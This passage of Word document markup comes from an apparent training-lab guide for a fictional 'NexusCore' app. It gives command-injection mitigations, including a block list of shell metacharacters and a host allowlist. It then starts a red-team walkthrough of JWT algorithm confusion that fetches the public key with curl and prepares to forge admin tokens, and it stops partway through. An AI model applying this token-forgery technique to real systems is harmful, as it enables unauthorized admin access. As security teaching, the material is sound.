              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Validate host against allowed patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Only accept valid IPv4 addresses or hostnames — reject everything else.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Use regex: allow only alphanumeric, dots, hyphens — block semicolons, pipes, backticks, $, &amp;&amp;.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">import re, ipaddress
def is_valid_host(host):
    # Check if it's a valid IP
    try: ipaddress.ip_address(host); return True
    except: pass
    # Check if it's a valid hostname (RFC 1123)
    return bool(re.match(r'^[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(\.[a-zA-Z0-9]([a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$', host))</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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Implement allowlist of permitted target hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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In a production environment, diagnostics should only run against known internal hosts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Maintain an allowlist: ["10.0.1.10", "10.0.1.20", "10.0.1.30"] — reject everything else.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Log all diagnostic runs and alert on unusual targets or frequencies.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A6F1E" w:sz="1"/>
              <w:left w:val="single" w:color="CA6F1E" w:sz="14"/>
              <w:bottom w:val="single" w:color="CA6F1E" w:sz="1"/>
              <w:right w:val="single" w:color="CA6F1E" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF9E7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="CA6F1E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️  Real-World Impact</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Command injection is consistently in OWASP Top 10. One successful injection = full server compromise. Shodan scans find thousands of exposed diagnostic tools. CVE-2021-44228 (Log4Shell) exploited a similar injection pattern with impact on millions of servers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C8D6E5" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="40" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pP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0"/>
        <w:gridCol w:w="8620"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="740"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">V4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8620"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT Algorithm Confusion (RS256 → HS256)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">[ Advanced ]</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276" w:sz="1"/>
              <w:left w:val="single" w:color="1A5276" w:sz="14"/>
              <w:bottom w:val="single" w:color="1A5276" w:sz="1"/>
              <w:right w:val="single" w:color="1A5276" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A5276"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">📖  What Is This Vulnerability?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">The server signs JWTs with RS256 (asymmetric — private key signs, public key verifies). But the vulnerable implementation reads the algorithm from the token's own header and switches the verification key accordingly. An attacker can change alg to HS256 and sign the token with the public key (which is exposed), forging admin tokens.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔴  RED TEAM — ATTACK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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Get the public key from the exposed endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Navigate to Admin → click "Get Public Key".</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Or directly call: GET /api/auth/public-key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Response: {"public_key": "nexuscore-public-key-2024", "algorithm": "RS256", ...}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Copy the public_key value — this is the HMAC secret we will use.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">curl http://localhost:7007/api/auth/public-key
# Response:
# {"public_key":"nexuscore-public-key-2024","algorithm":"RS256","key_id":"ncx-2024-primary"}</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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Decode your current JWT to understand the structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Open DevTools → Application → Cookies → Copy ncx_token value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Go to https://jwt.io → paste in Encoded box.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
